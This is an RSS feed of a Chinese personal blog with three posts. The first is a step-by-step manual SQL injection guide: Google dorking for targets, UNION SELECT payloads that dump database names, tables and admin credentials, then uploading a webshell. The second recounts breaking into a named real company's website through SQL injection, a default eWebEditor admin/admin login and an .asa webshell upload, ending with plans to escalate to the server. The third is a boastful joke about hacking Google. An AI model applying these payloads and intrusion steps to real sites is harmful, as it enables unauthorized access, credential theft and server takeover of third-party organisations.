<![CDATA[Heck's Blog]]> https://www.heckjj.com/index.php zh-cn https://www.heckjj.com/sql-injection-inner-learning-machine-website/ <![CDATA[手工注入国内某学习机公司网站简单过程]]> Heck <@hecks.tk> Fri, 04 May 2012 16:57:41 +0000 https://www.heckjj.com/sql-injection-inner-learning-machine-website/ 1、首先google hacking一把,在谷歌搜索框中输入site:xxxxx.com  inurl:asp/php?id=

2、判断是否过敏。

3、And 1=1   and 1=2  

4、Order by x--    x为数字,猜解有几个表段。。。

5、猜解到x以后,记住x的值。。。。

6、And 1=2 union select 1,2,3,4,5,....,x--

7、页面会报错,并出现数字,假设初相的数字是5,那么这一步就这样做:(用user()替换第六步中的5,再次提交)。报错的页面5的位置,会出现被5所覆盖的字符串的内容。记录该内容,这里用^表示。

8、再用version()替换刚才user()的位置,再次提交,目的是为了获取数据库的版本。报错的页面^的位置的内容会变为版本号码,例如5.0.27。

9、用database()替换上一步中的version(),查看当前库的名字,记录为^^。

10、MySQL5.0以上的版本添加了一个虚拟库information_schema,存储的是其他库的库名,表明,还有字段。

11、And 1=2 1,2,3,4,table_name,6,.....,x空格from information_schema.tables where table_schema=^^--(这一步要将^^的内容转换成十六进制在提交),提交之后,页面就会显示出库^^中所有的表名。将^^--改为^^ limit 0,1--提交,之页面只显示管理员账户的表名,记录为^^^。下面提交的时候要记得将^^^转换为十六进制再提交。

12、爆字段。And 1=2 1,2,3,4,column_name,6,.....,x空格from information_schema.columns where table_name=^^^limit 0,1--     提交,之后会爆出字段,记录为^^^^*。将limit 0,1改为limit 0,2再提交,可以再爆下一个字段^^^^&。

13、爆字段。And 1=2 1,2,3,4,^^^^*,6,...,x from ^^ limit 0,1--  提交,爆出该字段中第一个用户帐号。同样,用And 1=2 1,2,3,4,^^^^&,6,...,x from ^^ limit 0,1--提交,爆出与帐号对应的内容。

14、下面要找该网站的管理后台。。。有了帐号密码,再有后台登录URL,那么就可以进入后台了。:)。。。可以用啊D工具扫描后台,很容易的,你下载一个啊D,一看就会了。这里举个例子,一般后台的地址都是http://******.com/login.php之类的。。。之后用浏览器打开http://******.com/login.php,输入你爆出来的帐号和密码。

15、登陆成功以后,要找到网站后台可以上传的地方。

在可以上传的地方,上传webshell。

Tags - , ]]> https://www.heckjj.com/post/53/ <![CDATA[入侵检测卧龙集团(香港)有限公司网站]]> Heck <@hecks.tk> Sun, 22 Aug 2010 08:18:40 +0000 https://www.heckjj.com/post/53/ 说起安全检测的方法大家可能最熟悉的要属注入了,上传或者利用网站的配置不当或者管理员的疏忽等等,但是现在越来越多的入侵是针对第三方的插件或者文件。那么今天猪头(Heck)就带领大家走进ewebeditor在线文本编辑器的世界。了解该如何利用ewebeditor在线文本编辑器的疏漏来获取网站的权限。

    首先打开网站,很漂亮的一个网站程序。大概看了下网站是使用ASP程序发开的。那么首先想到的就是sql injection 也就是SQL注射漏洞,随便打开一个连接,地址为http://www.whcl.hk/about.asp?xlid=39 在地址后面加一个单引号发现返回的错误信息为:
  
      Microsoft JET Database Engine 错误 '80040e14'
    语法错误 (操作符丢失) 在查询表达式 'xlid=39‘' 中。
    
       /about.asp,行 18
  从这个错误提示我们能看出下面几点:
  1、网站使用的是Access数据库,通过ODBC连接数据库,而不是通过JET引擎连接数据库
  2、程序没有判断客户端提交的数据是否符合程序要求。
  3、该SQL语句所查询的表中有一名为xlid的字段。

一看就知道这个网站是基于ASP+ACCESS数据库的架构了。 使用and 1=1 与and 1=2 发现返回的信息不一样,说名存在SQL注射漏洞 不过网站数据库使用的是ACCESS数据库。那么只能猜解管理压密码登陆后台来拿WEBSHELL了 如果是sql server数据库的话有一定权限还可以使用BACK 来备份一个WEBSHELL。
   在确定了存在注射漏洞后,猪头开始了艰辛的猜密码的过程,在注射点后使用SQL语句
And (Select Count(*) from Admin)>=0
  发现页面返回正常说明存在admin表。那么既然知道了有admin表就继续猜字段吧。不过一般来说这样的程序用的字段无非这几个 username password id userid user_password pwd name userpwd admin_name admin_password什么的 所以猜这样的字段非常容易 语句一复制 挨个试就好了猜了半天 发现admin表里存在admin_username admin_password id三个字段。很明显admin_name 跟admin_password是存放管理员用户名与密码的。继续猜 and (select top 1 len(admin_name) from Admin)>0 。

     在这里猪头还是要先说下原理:如果top 1的username长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,比如>7成立,>8不成立,就是len(admin_name)=8 经过猪头的手工猜解与注射工具想结合终于成功找出管理员的后台密码为[admin_name] : admin [admin_password] :。到这里可能有人会问?既然有了注射工具为什么还要去手工去猜解密码呢? 这里猪头告诉大家,工具毕竟是死的。不能什么事都依靠工具。如果某一天你在做测试的使用并没有工具的帮忙难道就会没办法么?

   既然知道了管理员的用户名与密码那么就直接准备登陆网站后台了嘛?不过让我郁闷的事使用注射工具并没有发现网站的后台。并且网站没有admin目录。看来是为了防止网站被黑客攻击, 我想网站管量员已经更换了网站的后台路径。 不过这时平时猪头所搜索的一些路径就有了用武之地了。因为猪头呀平时喜欢搜索一些网站的后台地址等等的习惯。这样一旦遇到没有见过的路径 比如asdf/logi.asp dd.asp还有vip或者是乱写一通的等等。

    所以猪头我要在这里建议各位朋友呀。适当的多搜索一些有用的信息。 因为一个合格的安全工程师不但要有过人的技术,还需要掌握足够的资源 这样做起事来才能事半功倍。 猪头将自己所掌握的路径信息添加进到注射工具里。然后再一次使用后台地址扫描功能,成功的扫描出网站后台地址为vip/index.asp,如图:
    点击在新窗口中浏览此图片
    点击在新窗口中浏览此图片
     各位朋友们网站的后台功能非常多, 但是大部分权限只能上传一些jpg、gif的图片文件, 并不能直接上传ASP文件。 而且网站的后台没有数据库备份的功能。 一时之间还真是不知道该用什么办法去取得WEBSHELL 。 因为如果拿不到WEBSHELL的话只进入到后台并不能算检测成功的。 没办法,只能另外想取得WEBSHELL的方法。

         经过半天的寻找,猪头终于发现网站的后台使用的类似ewebeditor在线文本编辑器的东西,(后经检测确实为ewebeditor在线文本编辑器) 。为了确定猪头的判断,猪头首先将自己的asp木马后缀改名为.jpg的文件格式。 然后利用网站后台编辑文章的地方进行上传。图片上传成功以后我们只需要右键点一个图片的属性就看到图片上传后的地址为/wbbjq/UploadFile/ 可能有的朋友还对ewebeditor 在线文本编辑器不是很了解, 这里我简单叙述下 ewebeditor在线文本编辑器本身有一个控制后台,可能有很多网站的管理员在使用程序的使用并不知道程序本身已经带有了ewebeditor功能, 所以很大程度上没有对ewebeditor编辑器的重视。而ewebeditor在线文本编辑器的后台地址为admin_login.asp 所以我直接在路径改成/wbbjq/admin_login.asp 呵呵 成功的跳出来了ewebeditor编辑器的后台管理地址,如图:
点击在新窗口中浏览此图片
哈,这个密码没有改:

用户名admin 密码也是admin.真是让猪头蛋疼呀。

不过这下好了。本来只能上传一些jpg、gif的图片文件, 并不能直接上传ASP文件。可以进去管理这个编辑器的样式了,进入一项自定义样式的编辑,基其它文件类型制中加个asa的文件然后把webshell的后缀改成.asa的。然去后台随便找个发新闻的地方上传我们的webshell文件。
点击在新窗口中浏览此图片

这会就搞定了

点击在新窗口中浏览此图片

这个webshell的地址就拿到了按上面上传的地址访问。

点击在新窗口中浏览此图片


接着就可以通过webshell的CMD命令来提权拿下服务器了。。

Tags - , ]]> https://www.heckjj.com/post/16/ <![CDATA[嘿嘿,google被猪头我黑了。]]> Heck <@hecks.tk> Sat, 02 May 2009 04:10:31 +0000 https://www.heckjj.com/post/16/ 呵呵,牛X吧,google被猪头偶黑掉了。都改成猪头了。
大家相信吗?
嘿嘿,别像偶一样也变成猪头了哦。

下面截图为证:
点击在新窗口中浏览此图片

哈哈,强了吧,猪头了吧。 ]]>